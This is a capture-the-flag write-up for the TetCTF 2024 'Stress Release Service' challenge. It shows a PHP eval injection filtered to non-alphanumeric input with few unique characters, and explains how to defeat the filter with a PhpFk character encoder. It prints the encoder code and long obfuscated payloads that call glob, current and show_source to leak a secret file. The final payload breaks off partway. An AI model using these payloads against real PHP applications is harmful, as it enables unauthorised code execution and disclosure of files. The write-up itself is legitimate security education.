← Back to home

TetCTF 2024 — Stress Release Service

For a better New Year, we are introducing a service that can help you reduce stress: http://192.53.173.71:8080 . As our service is only available during the New Year, we are also providing you with a code for later use in material section.

We are given a PHP server that looks like this:

Code (php): 

1<br><center>
2<font size=5 color=red >STRESS RELEASE SERVICE</font>
3<br><br><br>
4To relieve all your stress from the old year, all you need is SHOUTTTTTT!!!!
5<br><br><br>
6<form action="/" method="GET">
7    <input type="submit" value="shout"/><input type="text" name="shout" value="@!@!@!@!@!@!@!@!" />
8</form>
9</center>
10
11<?php
12
13function validateInput($input) {
14    // To make your shout effective, it shouldn't contain alphabets or numbers.
15    $pattern = '/[a-z0-9]/i';
16    if (preg_match($pattern, $input)) {
17        return false;
18    } 
19
20    // and only a few characters. Let's make your shout clean.
21    $count = count(array_count_values(str_split($input)));
22    if ($count > 7) {
23        return false;
24    }
25
26    return true;
27}
28
29if (isset($_GET["shout"]) && !empty($_GET["shout"]) && is_string($_GET["shout"])) {
30    $voice = $_GET["shout"];
31    $res = "<center><br><br><img src=\"https://i.imgur.com/SvbbT0W.png\" width=5% /> WRONGGGGG WAYYYYYY TOOOO RELEASEEEEE STRESSSSSSSS!!!!!!</center>";
32    if(validateInput($voice) === true) {
33        eval("\$res='<center><br><br><img src=\"https://i.imgur.com/TL6siVW.png\" width=5% /> ".$voice.".</center>';");
34    }
35
36    if (strlen($res) < 300) {
37        echo $res;
38    } else {
39        echo "<center>Too loud!!! Please respect your neighbor.</center>";
40    }
41} 
42
43?>

with the flag stored in a variable in secret.php.

We can pass arbitrary input to $_GET["shout"], but our input is only eval'ed if it passes validateInput():

Code (php): 

1function validateInput($input) {
2    // To make your shout effective, it shouldn't contain alphabets or numbers.
3    $pattern = '/[a-z0-9]/i';
4    if (preg_match($pattern, $input)) {
5        return false;
6    } 
7
8    // and only a few characters. Let's make your shout clean.
9    $count = count(array_count_values(str_split($input)));
10    if ($count > 7) {
11        return false;
12    }
13
14    return true;
15}

so our payload

  1. cannot contain alphanumeric characters
  2. cannot contain more than 7 unique characters.

Furthermore, the payload is wrapped in a single-quoted string when eval'ed that we need to escape using

Code: 

1'.{payload}.'

At first glance, it looks like we can use PHPFuck to run arbitrary PHP with only 7 unique, non-alphanumeric characters (([+.^])). Unfortunately, PHPFuck is broken on PHP versions > 7.0.x, and the need to use a single quote to run the payload would bring the total unique characters to 8.

Another alternative, phpfuck, uses only 5 characters but requires alphanumeric input (^.9).

Instead, we can use PhpFk, which works on PHP 8 with 6 characters: (,.^'). Importantly, this set of characters also includes . and ', the two characters we need to run our payload!

We can then encode arbitrary PHP strings with

Code (php): 

1const INITIAL_CHAR_MAP = [
2    '(' => "'('",
3    ')' => "')'",
4    '*' => "('.'^','^'(')",
5    '+' => "(')'^'.'^',')",
6    ',' => "','",
7    '-' => "(')'^','^'(')",
8    '.' => "'.'",
9    '/' => "(')'^'.'^'(')",
10    'X' => "('^'^'.'^'(')",
11    'Y' => "(')'^'^'^'.')",
12    'Z' => "('^'^','^'(')",
13    '[' => "(')'^'^'^',')",
14    '\\' => "('^'^'.'^',')",
15    ']' => "(')'^'^'^'.'^','^'(')",
16    '^' => "'^'",
17    '_' => "(')'^'^'^'(')",
18    'p' => "('^'^'.')",
19    'q' => "(')'^'^'^'.'^'(')",
20    'r' => "('^'^',')",
21    's' => "(')'^'^'^','^'(')",
22    't' => "('^'^'.'^','^'(')",
23    'u' => "(')'^'^'^'.'^',')",
24    'v' => "('^'^'(')",
25    'w' => "(')'^'^')",
26];
27
28const STRSTR = '(' . INITIAL_CHAR_MAP['s'] . '.' . INITIAL_CHAR_MAP['t'] . '.' . INITIAL_CHAR_MAP['r'] . '.' . INITIAL_CHAR_MAP['s'] . '.' . INITIAL_CHAR_MAP['t'] . '.' . INITIAL_CHAR_MAP['r'] . ')';
29const SQRT = '(' . INITIAL_CHAR_MAP['s'] . '.' . INITIAL_CHAR_MAP['q'] . '.' . INITIAL_CHAR_MAP['r'] . '.' . INITIAL_CHAR_MAP['t'] . ')';
30const _FALSE = STRSTR . "('','.')";
31const ZERO_INT = SQRT . '(' . _FALSE . ')';
32const ZERO_CHAR = '(' . ZERO_INT . ".'')";
33
34const CHAR_MAP = INITIAL_CHAR_MAP + [
35        '0' => ZERO_CHAR,
36        '1' => '(' . ZERO_CHAR . "^')'^'(')",
37        '2' => '(' . ZERO_CHAR . "^'.'^',')",
38        '3' => '(' . ZERO_CHAR . "^')'^'.'^','^'(')",
39        '4' => '(' . ZERO_CHAR . "^','^'(')",
40        '5' => '(' . ZERO_CHAR . "^')'^',')",
41        '6' => '(' . ZERO_CHAR . "^'.'^'(')",
42        '7' => '(' . ZERO_CHAR . "^')'^'.')",
43        '@' => '(' . ZERO_CHAR . "^'^'^'.')",
44        'A' => '(' . ZERO_CHAR . "^')'^'^'^'.'^'(')",
45        'B' => '(' . ZERO_CHAR . "^'^'^',')",
46        'C' => '(' . ZERO_CHAR . "^')'^'^'^','^'(')",
47        'D' => '(' . ZERO_CHAR . "^'^'^'.'^','^'(')",
48        'E' => '(' . ZERO_CHAR . "^')'^'^'^'.'^',')",
49        'F' => '(' . ZERO_CHAR . "^'^'^'(')",
50        'G' => '(' . ZERO_CHAR . "^')'^'^')",
51        'h' => '(' . ZERO_CHAR . "^'^'^'.'^'(')",
52        'i' => '(' . ZERO_CHAR . "^')'^'^'^'.')",
53        'j' => '(' . ZERO_CHAR . "^'^'^','^'(')",
54        'k' => '(' . ZERO_CHAR . "^')'^'^'^',')",
55        'l' => '(' . ZERO_CHAR . "^'^'^'.'^',')",
56        'm' => '(' . ZERO_CHAR . "^')'^'^'^'.'^','^'(')",
57        'n' => '(' . ZERO_CHAR . "^'^')",
58        'o' => '(' . ZERO_CHAR . "^')'^'^'^'(')",
59    ];
60
61function obfuscateString(string $str): string
62{
63    return '' === $str ? "''" : join(
64        '.',
65        array_map(
66            fn($char) => sprintf('(%s)',
67                CHAR_MAP[$char]
68                ?? sprintf('((%s).(%s).(%s))(%s)',
69                CHAR_MAP['C'],
70                CHAR_MAP['h'],
71                CHAR_MAP['r'],
72                obfuscatePositiveInteger(ord($char))
73            )
74            ),
75            str_split($str)
76        )
77    );
78}
79
80function obfuscatePositiveInteger(int $nb): string
81{
82    assert($nb >= 0);
83    return match ($nb) {
84        0, 1, 2, 3, 4, 5, 6, 7 => CHAR_MAP[$nb],
85        8, 9 => sprintf('((%s).(%s).(%s).(%s).(%s).(%s))(%s)',
86            CHAR_MAP['o'], CHAR_MAP['C'], CHAR_MAP['t'], CHAR_MAP['D'], CHAR_MAP['E'], CHAR_MAP['C'],
87            join('.', array_map(
88                    fn($digit) => sprintf('(%s)', CHAR_MAP[$digit]),
89                    str_split(decoct($nb)))
90            )
91        ),
92        default => sprintf('(%s)', join(').(', array_map(__FUNCTION__, str_split("$nb")))),
93    };
94}
PhpFk.php L23-116

The main idea is that you can call functions in PHP from their string names. If we can inject something like

Code (php): 

1"join"("file"("secret.php"))

or

Code (php): 

1"show_source"("secret.php")

we can cat the flag file and get the flag.

The problem is that the PhpFk encoding is incredibly verbose — some letters can take as many as 2000 characters to encode. Furthermore, Apache has a default maximum request length of 8190 bytes. Because of URL encoding (ex. (%28), our actual maximum payload size is closer to 8190 / 3 = 2730 characters.

Our first problem is that encoding "secret.php" gives

Code (php): 

1((')'^'^'^','^'(')).(((((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^','^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^'^'^'.'^'(')).(('^'^',')))((((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'(')).((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'(')))).(((((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^','^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^'^'^'.'^'(')).(('^'^',')))((((((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^','^'(')).(('^'^'.'^','^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^'^'^'.'^','^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^'.'^',')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^','^'(')))((((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'(')))).(((((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^','^'(')).(('^'^'.'^','^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^'^'^'.'^','^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^'.'^',')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^','^'(')))((((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'(')))))).(('^'^',')).(((((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^','^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^'^'^'.'^'(')).(('^'^',')))((((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'(')).((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'(')))).(('^'^'.'^','^'(')).('.').(('^'^'.')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^'^'^'.'^'(')).(('^'^'.'))

— 5296 characters long.

Instead, we can use glob("s*") to get ["secret.php"], then extract the first element of the array using current to get the filename.

Encoding "glob", however, would require 4453 characters, negating all of our savings:

Code (php): 

1(((((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^','^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^'^'^'.'^'(')).(('^'^',')))((((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'(')).((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'.'^','^'(')))).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^'^'^'.'^',')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^'(')).(((((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^','^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^'^'^'.'^'(')).(('^'^',')))((((((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^','^'(')).(('^'^'.'^','^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^'^'^'.'^','^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^'.'^',')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^','^'(')))((((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'(')))).(((((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^','^'(')).(('^'^'.'^','^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^'^'^'.'^','^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^'.'^',')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^','^'(')))((((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'(')).((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).''))))))

Luckily, PHP function calling is case insensitive: "glob"(...) and "gLoB"(...) refer to the same function! Through some trial and error, we can encode "GloB" in only 751 characters,

Code (php): 

1(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^'^'^'.'^',')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^'^'^','))

"CurrEnt" in 633 characters,

Code (php): 

1(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^','^'(')).((')'^'^'^'.'^',')).(('^'^',')).(('^'^',')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^'.'^',')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^'^')).(('^'^'.'^','^'('))

and "s*" in 35:

Code (php): 

1((')'^'^'^','^'(')).(('.'^','^'('))

"secret.php" can then be encoded in 1427 characters as

Code (php): 

1("CurrEnt")(("GloB")("s*"))

Code (php): 

1((((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^','^'(')).((')'^'^'^'.'^',')).(('^'^',')).(('^'^',')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^'.'^',')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^'^')).(('^'^'.'^','^'(')))(((((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^'^'^'.'^',')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^'^'^',')))(((')'^'^'^','^'(')).(('.'^','^'('))))

Then, encoding "show_sourCE" (1057 characters) as

Code (php): 

1((')'^'^'^','^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^'^'^'.'^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^'(')).((')'^'^')).((')'^'^'^'(')).((')'^'^'^','^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^'(')).((')'^'^'^'.'^',')).(('^'^',')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^','^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^'.'^','))

we get out final payload:

Code (php): 

1'.("show_sourCE")(("CurrEnt")(("GloB")("s*"))).'

Code (php): 

1'.(((')'^'^'^','^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^'^'^'.'^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^'(')).((')'^'^')).((')'^'^'^'(')).((')'^'^'^','^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^'(')).((')'^'^'^'.'^',')).(('^'^',')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^','^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^'.'^',')))(((((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^','^'(')).((')'^'^'^'.'^',')).(('^'^',')).(('^'^',')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^'.'^',')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^'^')).(('^'^'.'^','^'(')))(((((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^